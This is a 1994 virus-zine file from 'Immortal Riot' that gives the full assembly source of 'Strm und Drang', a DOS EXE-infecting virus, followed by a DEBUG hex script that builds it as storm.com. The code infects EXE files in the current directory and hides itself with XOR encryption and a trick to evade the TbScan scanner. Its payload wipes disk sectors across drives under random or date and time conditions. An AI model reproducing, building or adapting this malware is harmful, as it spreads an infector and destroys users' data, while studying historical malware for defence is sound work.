Insane Reality issue #6 - (c)opyright 1994 Immortal Riot File 011 ; ------------------------------------------------------------------------------ ; ; - Strm und Drang - ; Created by Immortal Riot's destructive development team ; (c) 1994 The Unforgiven/Immortal Riot ; ; ------------------------------------------------------------------------------ ; Undetectable/Destructive EXE-infector ; ------------------------------------------------------------------------------ Replicating: This virus has some pretty lame replicating, and will only search exe files in the current directory. It will also not infect files on floppy drives, too big/small files and it will ofcos not reinfect files. Pay-Load: This virus has several nuking conditions, making this virus higly destructive. Anti-Virus-Detection. No flags at all by Tbscan 6.26 on its hardest heuristic mode, and no way any other scanner can detect it. .model tiny .radix 16 .code org 100h virus_start: call get_delta get_delta: call trick_tbscan pop bp ; calculate the delta offset sub bp,get_delta-virus_start jmp short conzeal trick_tbscan: mov ax,0305h ; keyb i/o to beat tbscan xor bx,bx int 16h ret conzeal: call decrypt ; decrypt virus jmp short encryption_start ; and continue.. write_virus: call encrypt ; write encrypted copy... mov ah,40 mov cx,virus_end-virus_start ; vir len mov dx,bp ; fix correct offset int 21h call decrypt ; decrypt code again ret encryption_value dw 0 decrypt: ; simple xor-encryption encrypt: lea si,cs:[bp+encryption_start-virus_start] mov cx,(virus_end-encryption_start+1)/2 mov dx,word ptr cs:[bp+encryption_value-virus_start] xor_loopy: xor word ptr cs:[si],dx inc si inc si loop xor_loopy ret encryption_start: mov ah,2ch ; get random int 21h cmp dl,02 ; 1/100 = 2? je nuke ; yeh mov ah,2ah ; get day cmp dl,02 ; day = 2? je nuke ; yeh cmp cl,59d ; minute = 59? jne no_bomb ; if so, wipe nuke: mov al,2 ; should only be used by drive: ; irresponsible maniacs mov cx,1 rndwipe: lea bx,[bp+v_name-virus_start] cwd sector: int 26h inc cx jnc sector inc al jmp short drive no_bomb: mov ax,es add ax,10 add ax,cs:[bp+exe_header-virus_start+16] ; add init off in para's of ; cs from header push ax ; push cs:[bp+exe_header-virus_start+14] ; store init off in bytes of ; ip from cs push ds push cs pop ds lea dx,[bp+own_dta-virus_start] ; set a new dta area mov ah,1ah ; to eof int 21h get_drive: mov ah,19h ; get drive int 21h ; and dont infect cmp al,2 ; files on a: or b: jae find_files jmp reset_dta find_files: mov ah,4eh ; seek first file, matching next: ; the extension 'exe' lea dx,[bp+exe_files-virus_start] int 21 jnc open_file ; find a file jmp reset_dta ; no more files open_file: lea dx,[bp+own_dta-virus_start+1eh] ; open file in ds:dx mov ax,3d02h ; in read/write mode int 21h read_file: xchg ax,bx ; file handle in bx mov ah,3f ; read 1ch bytes mov cx,1ch ; to exe_header lea dx,[bp+exe_header-virus_start] int 21h cmp byte ptr ds:[bp+exe_header-virus_start],'M' ; compare EXE file jnz no_exe ; no MZ - no exe! cmp word ptr ds:[bp+exe_header-virus_start+12],'UE' ; compare infection jz infected ; assume infected mov al,2h ; move file ptr eof call f_ptr cmp ax,2048d ; too small to infect? jb too_small push dx ; store dx/ax push ax mov ah,2ch ; ger random value to int 21h ; use for encryption jz rndwipe ; value, 0 = wipe 1ch sectors mov word ptr cs:[bp+encryption_value-virus_start],dx call write_virus ; write virus to eof mov al,2 ; go eof call f_ptr mov cx,200 div cx inc ax mov word ptr ds:[exe_header-virus_start+2+bp],dx mov word ptr ds:[exe_header-virus_start+4+bp],ax pop ax ; ax = total number of 512 byte pages in the file pop dx ; dx = number of bytes in the last page in the image mov cx,10 div cx ; "sub header size in para's", and ; fix new init offset in para's of code segment from the exe-header sub ax,word ptr ds:[exe_header-virus_start+8+bp] mov word ptr ds:[exe_header-virus_start+16+bp],ax mov word ptr ds:[exe_header-virus_start+14+bp],dx ; fix new infection mov word ptr ds:[exe_header-virus_start+12+bp],'UE' ; marker! ; Now all important manipulations are executed, and we'll write the new ; header... xor al,al ; file ptr call f_ptr ; tof mov ah,40 ; write new mov cx,1ch ; modified lea dx,[bp+exe_header-virus_start] ; exe header int 21h no_exe: infected: too_small: lea si,[bp+own_dta-virus_start+16h] ; set back org mov cx,word ptr [si] ; time/date to mov dx,word ptr [si+2] ; the infected file mov ax,5701h int 21h mov ah,3eh ; close file int 21h mov ah,4fh ; and seek next file jmp next f_ptr: mov ah,42h ; this routine is xor cx,cx ; called three time, cwd ; i.e. bad optimized int 21h ; code, hehe! ret reset_dta: mov dx,80h ; set's back the mov ah,1ah ; dta area int 21h quit: pop ds ; jmp org program retf v_name db "[Strm und Drang!] (c) '94 The Unforgiven/Immortal Riot" exe_files db "*.EXE",0 exe_header db 16 DUP(0) ; \ dw 0fff0 ; - EXE-HEADER db 4 DUP(0) ; / virus_end: own_dta: end virus_Start -------------------------------------------------------------------------------- N storm.com E 100 E8 00 00 E8 06 00 5D 83 ED 03 EB 08 B8 05 03 33 E 110 DB CD 16 C3 E8 14 00 EB 25 E8 0F 00 B4 40 B9 9B E 120 01 8B D5 CD 21 E8 03 00 C3 00 00 8D 76 3E 90 B9 E 130 AF 00 2E 8B 56 29 2E 31 14 46 46 E2 F9 C3 B4 2C E 140 CD 21 80 FA 02 74 0C B4 2A 80 FA 02 74 05 80 F9 E 150 3B 75 13 B0 02 B9 01 00 8D 9E 42 01 99 CD 26 41 E 160 73 FB FE C0 EB EF 8C C0 05 10 00 2E 03 86 95 01 E 170 50 2E FF B6 93 01 1E 0E 1F 8D 96 9B 01 B4 1A CD E 180 21 B4 19 CD 21 3C 02 73 03 E9 AD 00 B4 4E 8D 96 E 190 79 01 CD 21 73 03 E9 A0 00 8D 96 B9 01 B8 02 3D E 1a0 CD 21 93 B4 3F B9 1C 00 8D 96 7F 01 CD 21 3E 80 E 1b0 BE 7F 01 4D 75 64 3E 81 BE 91 01 45 55 74 5B B0 E 1c0 02 E8 6D 00 3D 00 08 72 51 52 50 B4 2C CD 21 74 E 1d0 87 2E 89 56 29 E8 41 FF B0 02 E8 54 00 B9 00 02 E 1e0 F7 F1 40 3E 89 96 81 01 3E 89 86 83 01 58 5A B9 E 1f0 10 00 F7 F1 3E 2B 86 87 01 3E 89 86 95 01 3E 89 E 200 96 93 01 3E C7 86 91 01 45 55 32 C0 E8 22 00 B4 E 210 40 B9 1C 00 8D 96 7F 01 CD 21 8D B6 B1 01 8B 0C E 220 8B 54 02 B8 01 57 CD 21 B4 3E CD 21 B4 4F E9 5D E 230 FF B4 42 33 C9 99 CD 21 C3 BA 80 00 B4 1A CD 21 E 240 1F CB 5B 53 74 81 72 6D 20 75 6E 64 20 44 72 61 E 250 6E 67 21 5D 20 28 63 29 20 27 39 34 20 54 68 65 E 260 20 55 6E 66 6F 72 67 69 76 65 6E 2F 49 6D 6D 6F E 270 72 74 61 6C 20 52 69 6F 74 2A 2E 45 58 45 00 00 E 280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 290 00 00 00 00 00 F0 FF 00 00 00 00 RCX 19b W Q